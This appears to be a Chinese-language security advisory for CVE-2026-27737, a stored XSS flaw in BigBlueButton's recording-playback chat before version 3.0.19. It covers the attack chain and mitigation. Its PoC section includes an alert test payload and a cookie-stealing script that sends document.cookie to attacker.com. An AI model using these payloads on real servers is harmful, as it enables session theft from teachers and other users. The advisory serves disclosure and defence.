CVE-2026-27737 CVSS 6.5 中危

CVE-2026-27737 BigBlueButton存储型XSS漏洞

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-27737

漏洞类型

存储型XSS

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

BigBlueButton

漏洞概述

BigBlueButton是一款开源虚拟教室软件。在其3.0.19之前的版本中，录制回放功能的演示格式存在安全缺陷。该功能未对公开聊天中的用户输入进行充分过滤和清洗，导致存在存储型跨站脚本攻击（XSS）漏洞。攻击者可在聊天中植入恶意脚本，当其他用户回放该录制的课程时，恶意脚本将被触发，从而遭受定向攻击。

技术细节

该漏洞位于BigBlueButton的录制回放模块中，具体表现为存储型跨站脚本攻击（Stored XSS）。在受影响版本中，应用程序在处理公开聊天记录的展示时，未对用户输入的动态内容实施严格的上下文感知输出编码。攻击者首先需要获取一个低权限账户加入会议，随后在公开聊天区域发送构造好的恶意HTML/JavaScript载荷（例如利用`<script>`标签或事件处理器）。系统将这些未过滤的输入持久化存储在服务器端的录制文件中。当具有更高权限或普通用户访问并回放该会议录像时，客户端浏览器会解析并渲染包含恶意代码的聊天记录，进而触发脚本执行。由于CVSS向量中UI:N表示无需用户交互，脚本在回放加载时自动运行。攻击者可借此窃取Cookie、执行未授权操作或进行钓鱼攻击，严重威胁数据完整性与用户隐私。

攻击链分析

STEP 1

1. 侦察与接入

攻击者获取低权限账户，访问目标BigBlueButton服务器并加入一个正在进行的会议。

STEP 2

2. 载荷注入

攻击者在公开聊天框中发送包含恶意JavaScript代码的HTML片段（如XSS Payload）。

STEP 3

3. 数据持久化

BigBlueButton服务器将包含恶意代码的聊天记录原样保存到会议录制文件中。

STEP 4

4. 触发漏洞

受害者（如教师或管理员）访问并回放该会议录像。

STEP 5

5. 攻击执行

录制回放界面加载聊天记录时，未过滤的恶意代码在受害者浏览器中执行，攻击者达成目的。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Proof of Concept for CVE-2026-27737
// Attacker sends the following payload in the public chat during a live session.
// The payload is stored in the recording data and executes when the victim replays it.

// Payload 1: Simple XSS verification
var xssPayload = "<img src=x onerror=alert('CVE-2026-27737 Confirmed')>";

// Payload 2: Cookie Stealer (Example)
var stealPayload = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>";

// The vulnerability occurs because the playback player renders the chat message
// as innerHTML without sanitization, causing the browser to execute the script.

影响范围

BigBlueButton < 3.0.19

防御指南

临时缓解措施

建议立即升级至BigBlueButton 3.0.19或更高版本。若无法立即升级，应限制对历史录制的访问权限，并在Web应用防火墙（WAF）中配置规则，拦截录制回放请求中潜在的恶意脚本特征。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表